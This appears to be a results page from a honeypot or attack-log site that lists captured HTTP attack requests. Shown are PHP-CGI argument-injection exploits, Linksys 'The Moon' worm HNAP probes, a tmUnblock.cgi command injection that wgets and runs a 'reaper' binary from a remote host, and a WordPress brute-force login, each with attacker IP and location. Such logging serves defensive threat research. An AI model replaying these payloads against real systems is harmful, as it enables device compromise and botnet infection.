This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 558521 results (55853 pages)

PHP-CGI exploit

[Attack info]
Attacker: 94.191.113.146
Dest. port: 80
Time: 30/09/2020 20:19:58
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian
POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 Content-Length: 28 Host: 169.68.221.237 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 connection: Keep-Alive cache-control: no-cache Content-Type: application/x-www-form-urlencoded <?php die(@md5(PHP-CGI)); ?>

PHP-CGI exploit

[Attack info]
Attacker: 94.191.113.146
Dest. port: 80
Time: 30/09/2020 20:19:58
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian
POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 Content-Length: 28 Host: 169.68.221.237 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 connection: Keep-Alive cache-control: no-cache Content-Type: application/x-www-form-urlencoded <?php die(@md5(PHP-CGI)); ?>

PHP-CGI exploit

[Attack info]
Attacker: 94.191.113.146
Dest. port: 80
Time: 30/09/2020 20:19:58
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 Content-Length: 28 Host: 169.68.221.237 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 connection: Keep-Alive cache-control: no-cache Content-Type: application/x-www-form-urlencoded <?php die(@md5(PHP-CGI)); ?>

Linksys "The Moon" Worm

[Attack info]
Attacker: 46.172.212.146
Dest. port: 80
Time: 27/08/2020 00:25:06
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS48330 FOP Sinev Maksim Viktorovich
Location: Crimea, Simferopol (zipcode 10421)
rDNS: pool.sevtele.com
POST /HNAP1/ HTTP/1.1 Content-Length: 331 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWanSettings" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Host: 71.27.174.199 referer: http://71.27.174.199/ Content-Type: text/xml; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWanSettings xmlns="http://purenetworks.com/HNAP1/"> </GetWanSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 46.172.212.146
Dest. port: 80
Time: 27/08/2020 00:25:05
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS48330 FOP Sinev Maksim Viktorovich
Location: Crimea, Simferopol (zipcode 10421)
rDNS: pool.sevtele.com
POST /HNAP1/ HTTP/1.1 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Host: 71.27.174.199 referer: http://71.27.174.199/ Content-Type: text/xml; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadios xmlns="http://purenetworks.com/HNAP1/"> </GetWLanRadios> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 46.172.212.146
Dest. port: 80
Time: 27/08/2020 00:25:05
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS48330 FOP Sinev Maksim Viktorovich
Location: Crimea, Simferopol (zipcode 10421)
rDNS: pool.sevtele.com
POST /HNAP1/ HTTP/1.1 Content-Length: 337 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterSettings" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Host: 71.27.174.199 referer: http://71.27.174.199/ Content-Type: text/xml; charset=UTF-8 authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterSettings xmlns="http://purenetworks.com/HNAP1/"> </GetRouterSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 46.172.212.146
Dest. port: 80
Time: 27/08/2020 00:25:05
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS48330 FOP Sinev Maksim Viktorovich
Location: Crimea, Simferopol (zipcode 10421)
rDNS: pool.sevtele.com
POST /HNAP1/ HTTP/1.1 Content-Length: 345 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Host: 71.27.174.199 referer: http://71.27.174.199/ Content-Type: text/xml; charset=UTF-8 authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/"> </GetRouterLanSettings2> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 46.172.212.146
Dest. port: 80
Time: 27/08/2020 00:25:04
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS48330 FOP Sinev Maksim Viktorovich
Location: Crimea, Simferopol (zipcode 10421)
rDNS: pool.sevtele.com
POST /HNAP1/ HTTP/1.1 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Host: 71.27.174.199 referer: http://71.27.174.199/ Content-Type: text/xml; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <IsDeviceReady xmlns="http://purenetworks.com/HNAP1/"> </IsDeviceReady> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 158.255.7.30
Dest. port: 8080
Time: 03/06/2020 05:50:11
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS49335 LLC Server v arendy
Location: Moscow, Moscow
rDNS: server.winac725.com
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: / User-Agent: python-requests/2.20.0 Host: 46.29.167.45:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F46.29.167.45%2Freaper%2Freap.mpsl%3B+chmod+777+reap.mpsl%3B+.%2Freap.mpsl+Reaper.linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Start

Wordpress Login Bruteforcer

[Attack info]
Attacker: 195.161.114.244
Dest. port: 80
Time: 03/10/2019 22:18:11
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS8342 JSC RTComm.RU
Location: Moscow, Moscow
rDNS: notarius-russia.ru
POST /wp-login.php HTTP/1.1 Content-Length: 130 accept-encoding: gzip Host: host188-94-dynamic.56-82-r.retail.telecomitalia.it User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 connection: close Content-Type: application/x-www-form-urlencoded log=&pwd=K98pWjiSq12&wp-submit=Log In&redirect_to=http://host188-94-dynamic.56-82-r.retail.telecomitalia.it/wp-admin/&testcookie=1